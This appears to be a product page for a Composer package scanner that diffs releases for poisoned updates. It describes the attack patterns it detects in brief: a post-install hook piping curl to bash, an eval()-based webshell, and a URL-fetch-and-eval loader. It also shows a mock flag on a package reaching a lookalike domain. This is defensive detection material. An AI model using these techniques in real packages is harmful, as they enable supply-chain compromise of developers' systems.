Package registryComposer

Composer packages, checked on every release.

A poisoned Composer release can run code from a composer.json install hook, before any class is required. Extuno diffs each version and reads the PHP for install-script RCE, backdoors, and webshells - with static and AI analysis on every scan.

Composer - live inspectionInspecting
monolog/monolog 3.10
composer package
3.9->3.10
Static
Dynamic
AI
Analyzing update
What Extuno catches in Composer

Evidence, not guesswork.

Each finding names the change, why it is dangerous, and the recommended action.

Diff finding

Install-script RCE

A composer.json post-install hook runs curl|bash on `composer install`.

Critical
Diff finding

Injected webshell

A file gains eval() over request data - a remote-controlled shell.

Critical
Diff finding

Remote code loader

The package fetches a URL and eval()s the response.

Review
See it on a poisoned update

Install-time PHP, caught before composer runs it

Extuno reads the composer.json hooks and the PHP, and flags the download-and-run install command.

  • + Vulnerability and secret-leak testing on every version
  • + Static analysis reads the package without running it
  • + Dynamic sandbox runs it live and records behavior
  • + AI code analysis reads the full source and correlates the change against prior versions
your-app
monolog/monolog 3.10
guzzlehttp/guzzle 7.9
symfony/console 7.1
acme/logger-helper 1.2.1post-install-cmd
acme/logger-helperpackagist-cdn.co

Scan your first Composer package free.

Your first 5 credits are free - that is 5 full scans, no card required.